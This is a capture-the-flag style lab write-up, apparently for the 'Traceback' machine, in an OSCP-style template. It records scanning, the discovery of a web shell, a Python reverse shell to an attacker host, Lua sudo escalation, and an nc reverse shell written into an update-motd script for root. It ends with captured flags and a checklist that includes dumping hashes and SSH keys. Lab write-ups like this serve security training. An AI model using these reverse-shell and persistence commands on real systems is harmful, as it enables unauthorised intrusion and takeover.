10.10.10.X

    $ nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 13:30 EDT
    Nmap scan report for 10.10.10.181
    Host is up (0.059s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
    |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
    |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Help us
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 143.71 seconds

Enumeration > Web Services > Dirb\DirBuster

    $ gobuster dir -u http://10.10.10.181 -w shells.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.181
    [+] Threads:        10
    [+] Wordlist:       shells.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/08/26 13:39:49 Starting gobuster
    ===============================================================
    /smevk.php (Status: 200)
    ===============================================================
    2020/08/26 13:39:51 Finished
    ===============================================================

Exploitation

Service Exploited: SmEvK v3
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

I have no idea why this is even a thing. You'll probably never see this in reality.

Exploit Code Used

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Proof\Local.txt File

☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Post Exploitation

Host Information: Operating System, Architecture, Domain, Installed Updates
File System: Writeable Files\Directories, Directory List
Running Processes: Process List
Installed Applications: Installed Applications
Users & Groups: Users (Webadmin, Sysadmin), Groups
Network: IPConfig\IFConfig, Network Processes, ARP, DNS, Route
Software Versions: Software Versions, Potential Exploits

Priv Escalation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

Lateral from web to sysadmin using Lua

Exploit Code Used

    echo "require('os');" > priv.lua
    echo "os.execute('/bin/bash');" >> priv.lua
    sudo -u sysadmin /home/sysadmin/luvit ./priv.lua

From here, use PSPY to find update-motd.d running every 30 seconds.

    echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header

Immediately SSH using generated keys and motd will execute and spawn a root shell.

Proof\Local.txt File

☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Proof\Flags\Other

    sysadmin@traceback:~$ cat user.txt
    cat user.txt
    4c38de47fbb880068709247dccfe53bf
    cat /root/root.txt
    e0d6f998ac7c3f0a47dd1b0b33198cfa

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning

WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test

Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux

Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation

Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py

Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account

Windows
☐ List of exploits

Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files